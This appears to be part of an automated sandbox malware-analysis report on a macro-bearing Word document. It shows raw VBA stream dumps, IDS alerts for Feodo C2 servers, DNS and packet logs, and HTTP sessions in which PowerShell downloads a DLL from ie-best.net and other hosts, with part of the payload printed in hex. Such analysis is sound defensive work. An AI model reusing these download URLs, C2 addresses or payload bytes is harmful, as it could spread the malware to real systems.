                                              Data ASCII:S k y 5 m d b f r e 3 x e 7 q 8 . S . k . y . 5 . m . d . b . f . r . e . 3 . x . e . 7 . q . 8 . . . H j 8 d h q r d h _ 8 4 9 8 . H . j . 8 . d . h . q . r . d . h . _ . 8 . 4 . 9 . 8 . . . D u l z 0 g 2 a 3 q q d j s t y 7 . D . u . l . z . 0 . g . 2 . a . 3 . q . q . d . j . s . t . y . 7 . . . . .
                                              Data Raw:53 6b 79 35 6d 64 62 66 72 65 33 78 65 37 71 38 00 53 00 6b 00 79 00 35 00 6d 00 64 00 62 00 66 00 72 00 65 00 33 00 78 00 65 00 37 00 71 00 38 00 00 00 48 6a 38 64 68 71 72 64 68 5f 38 34 39 38 00 48 00 6a 00 38 00 64 00 68 00 71 00 72 00 64 00 68 00 5f 00 38 00 34 00 39 00 38 00 00 00 44 75 6c 7a 30 67 32 61 33 71 71 64 6a 73 74 79 37 00 44 00 75 00 6c 00 7a 00 30 00 67 00 32 00
                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6005
                                              General
                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:6005
                                              Entropy:5.67360235538
                                              Base64 Encoded:True
                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                              Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 682
                                              General
                                              Stream Path:Macros/VBA/dir
                                              File Type:data
                                              Stream Size:682
                                              Entropy:6.42612592717
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . N . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . ) . m . . . . ! O f f i c
                                              Data Raw:01 a6 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 4e d7 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                              Stream Path: WordDocument, File Type: data, Stream Size: 114302
                                              General
                                              Stream Path:WordDocument
                                              File Type:data
                                              Stream Size:114302
                                              Entropy:7.29269826557
                                              Base64 Encoded:True
                                              Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . ! ` . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . ! X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 21 60 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e be 01 00 62 7f 00 00 62 7f 00 00 21 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                              Stream Path: word, File Type: data, Stream Size: 348
                                              General
                                              Stream Path:word
                                              File Type:data
                                              Stream Size:348
                                              Entropy:7.39752642527
                                              Base64 Encoded:False
                                              Data ASCII:. . . . t . . . V 8 ! { . Z . . . . ! . . Q i . ^ m U T . . . . t . . # . . ` . = . . . . . . % . % . . . w % . . . . . c < . . . 5 . I . . . o l ! . . x ] . . . 0 . . . . . . s G . . . X . . % % ~ . . P . . d . . . . E . A . . 4 3 h . . . N . . : ! . . . . . . S . _ . . . . m . . . % - . A 4 . # i . = . . f . z i . . . . ] : . . b . . . . o z . . J . . . . r . . . . } . D . ~ . # > . . . . . . i . . . p . ) . . . . . . ] . K . . A 6 . . . . t . . 1 . . ; . . . . . . . . X . . . w . . 4 . d d . . e . . j .
                                              Data Raw:e2 09 f9 1d 74 b8 90 b1 56 38 21 7b e2 5a c9 d5 09 cc 21 dc bf 51 69 ff 5e 6d 55 54 f7 a2 ab eb 74 99 d8 23 13 99 60 ff 3d df d9 0b eb a7 9a 25 80 25 87 01 04 77 25 91 9f f9 bf 07 63 3c b9 b3 8d 35 06 49 81 a5 c1 6f 6c 21 9e e0 78 5d 14 b6 d2 30 d3 d2 1b a9 e7 fd 73 47 83 1a da 58 9c 01 25 25 7e b5 a0 50 a3 db 64 18 95 e2 d8 45 18 41 e5 09 34 33 68 e7 98 e3 4e 09 d6 3a 21 a7 95 13

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              02/17/21-22:57:35.428129TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 12491718080192.168.2.22195.159.28.230
                                              02/17/21-22:58:24.291871TCP2404310ET CNC Feodo Tracker Reported CnC Server TCP group 6491738080192.168.2.22162.241.204.233
                                              02/17/21-22:58:31.780135TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 34917580192.168.2.22115.21.224.117

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Feb 17, 2021 22:56:44.783550978 CET4916780192.168.2.22166.62.28.130
                                              Feb 17, 2021 22:56:44.991023064 CET8049167166.62.28.130192.168.2.22
                                              Feb 17, 2021 22:56:44.991354942 CET4916780192.168.2.22166.62.28.130
                                              Feb 17, 2021 22:56:44.993495941 CET4916780192.168.2.22166.62.28.130
                                              Feb 17, 2021 22:56:45.200732946 CET8049167166.62.28.130192.168.2.22
                                              Feb 17, 2021 22:56:45.223210096 CET8049167166.62.28.130192.168.2.22
                                              Feb 17, 2021 22:56:45.223351955 CET8049167166.62.28.130192.168.2.22
                                              Feb 17, 2021 22:56:45.223459005 CET4916780192.168.2.22166.62.28.130
                                              Feb 17, 2021 22:56:45.224011898 CET4916780192.168.2.22166.62.28.130
                                              Feb 17, 2021 22:56:45.294106007 CET4916880192.168.2.22166.62.10.32
                                              Feb 17, 2021 22:56:45.431421041 CET8049167166.62.28.130192.168.2.22
                                              Feb 17, 2021 22:56:45.509422064 CET8049168166.62.10.32192.168.2.22
                                              Feb 17, 2021 22:56:45.509637117 CET4916880192.168.2.22166.62.10.32
                                              Feb 17, 2021 22:56:45.509758949 CET4916880192.168.2.22166.62.10.32
                                              Feb 17, 2021 22:56:45.724998951 CET8049168166.62.10.32192.168.2.22
                                              Feb 17, 2021 22:56:45.737011909 CET8049168166.62.10.32192.168.2.22
                                              Feb 17, 2021 22:56:45.737037897 CET8049168166.62.10.32192.168.2.22
                                              Feb 17, 2021 22:56:45.737143993 CET4916880192.168.2.22166.62.10.32
                                              Feb 17, 2021 22:56:45.807948112 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:45.966809988 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:45.966911077 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:45.967051029 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.125727892 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499458075 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499519110 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499558926 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499598026 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499635935 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499684095 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499684095 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.499725103 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.499727964 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499738932 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.499768972 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499809027 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499844074 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.499847889 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.499914885 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.658565044 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658621073 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658658981 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658698082 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658737898 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658776045 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658778906 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.658813000 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.658817053 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658842087 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.658858061 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658906937 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658931971 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.658951044 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.658989906 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659028053 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.659029007 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659068108 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659091949 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.659105062 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659145117 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659166098 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.659183979 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659250975 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.659327984 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.659610987 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659655094 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659692049 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659727097 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.659739017 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.659821987 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.661585093 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.817890882 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.817951918 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.817991972 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818032026 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818069935 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818120956 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818150997 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818299055 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818312883 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818353891 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818401098 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818406105 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818444014 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818474054 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818541050 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818581104 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818619967 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818624020 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818659067 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818689108 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818707943 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818775892 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818778992 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818820000 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818857908 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818896055 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818900108 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818933964 CET8049169192.185.52.115192.168.2.22
                                              Feb 17, 2021 22:56:46.818969965 CET4916980192.168.2.22192.185.52.115
                                              Feb 17, 2021 22:56:46.818972111 CET8049169192.185.52.115192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Feb 17, 2021 22:56:40.278003931 CET5219753192.168.2.228.8.8.8
                                              Feb 17, 2021 22:56:40.341351032 CET53521978.8.8.8192.168.2.22
                                              Feb 17, 2021 22:56:42.668936968 CET5309953192.168.2.228.8.8.8
                                              Feb 17, 2021 22:56:43.677108049 CET5309953192.168.2.228.8.8.8
                                              Feb 17, 2021 22:56:44.691370010 CET5309953192.168.2.228.8.8.8
                                              Feb 17, 2021 22:56:44.766448975 CET53530998.8.8.8192.168.2.22
                                              Feb 17, 2021 22:56:45.235028028 CET5283853192.168.2.228.8.8.8
                                              Feb 17, 2021 22:56:45.293414116 CET53528388.8.8.8192.168.2.22
                                              Feb 17, 2021 22:56:45.746856928 CET6120053192.168.2.228.8.8.8
                                              Feb 17, 2021 22:56:45.806917906 CET53612008.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Feb 17, 2021 22:56:40.278003931 CET192.168.2.228.8.8.80x2c09Standard query (0)cab.mykfn.comA (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:42.668936968 CET192.168.2.228.8.8.80xd8c3Standard query (0)bhaktivrind.comA (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:43.677108049 CET192.168.2.228.8.8.80xd8c3Standard query (0)bhaktivrind.comA (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:44.691370010 CET192.168.2.228.8.8.80xd8c3Standard query (0)bhaktivrind.comA (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:45.235028028 CET192.168.2.228.8.8.80x26d4Standard query (0)vanddnabhargave.comA (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:45.746856928 CET192.168.2.228.8.8.80xad13Standard query (0)ie-best.netA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Feb 17, 2021 22:56:40.341351032 CET8.8.8.8192.168.2.220x2c09Name error (3)cab.mykfn.comnonenoneA (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:44.766448975 CET8.8.8.8192.168.2.220xd8c3No error (0)bhaktivrind.com166.62.28.130A (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:45.293414116 CET8.8.8.8192.168.2.220x26d4No error (0)vanddnabhargave.com166.62.10.32A (IP address)IN (0x0001)
                                              Feb 17, 2021 22:56:45.806917906 CET8.8.8.8192.168.2.220xad13No error (0)ie-best.net192.185.52.115A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • bhaktivrind.com
                                              • vanddnabhargave.com
                                              • ie-best.net

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249167166.62.28.13080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 17, 2021 22:56:44.993495941 CET0OUTGET /cgi-bin/JBbb8/ HTTP/1.1
                                              Host: bhaktivrind.com
                                              Connection: Keep-Alive
                                              Feb 17, 2021 22:56:45.223210096 CET1INHTTP/1.1 500 Internal Server Error
                                              Date: Wed, 17 Feb 2021 21:56:45 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.4.12
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Vary: User-Agent
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249168166.62.10.3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 17, 2021 22:56:45.509758949 CET1OUTGET /asset/W9o/ HTTP/1.1
                                              Host: vanddnabhargave.com
                                              Connection: Keep-Alive
                                              Feb 17, 2021 22:56:45.737011909 CET3INHTTP/1.1 404 Not Found
                                              Date: Wed, 17 Feb 2021 21:56:45 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, Keep-Alive
                                              Accept-Ranges: bytes
                                              Vary: Accept-Encoding,User-Agent
                                              Content-Length: 1699
                                              Keep-Alive: timeout=5
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30
                                              Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249169192.185.52.11580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 17, 2021 22:56:45.967051029 CET4OUTGET /online-timer-kvhxz/ilXL/ HTTP/1.1
                                              Host: ie-best.net
                                              Connection: Keep-Alive
                                              Feb 17, 2021 22:56:46.499458075 CET5INHTTP/1.1 200 OK
                                              Date: Wed, 17 Feb 2021 21:56:46 GMT
                                              Server: Apache
                                              Cache-Control: no-cache, must-revalidate
                                              Pragma: no-cache
                                              Expires: Wed, 17 Feb 2021 21:56:46 GMT
                                              Content-Disposition: attachment; filename="iH51Y9HC9GOPOX3.dll"
                                              Content-Transfer-Encoding: binary
                                              Set-Cookie: 602d911e69437=1613599006; expires=Wed, 17-Feb-2021 21:57:46 GMT; path=/
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, Keep-Alive
                                              Last-Modified: Wed, 17 Feb 2021 21:56:46 GMT
                                              Vary: Accept-Encoding
                                              Keep-Alive: timeout=5, max=75
                                              Transfer-Encoding: chunked
                                              Content-Type: application/octet-stream
                                              Data Raw: 33 64 30 62 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 86 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 fa 04 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 18 c6 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 05 00 58 15 00 00 00 a0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 57 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 14 ed 04 00 00 70 00 00 00 ee 04 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 60 05 00 00 02 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 70 05 00 00 02 00 00 00 32 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 80 05 00 00 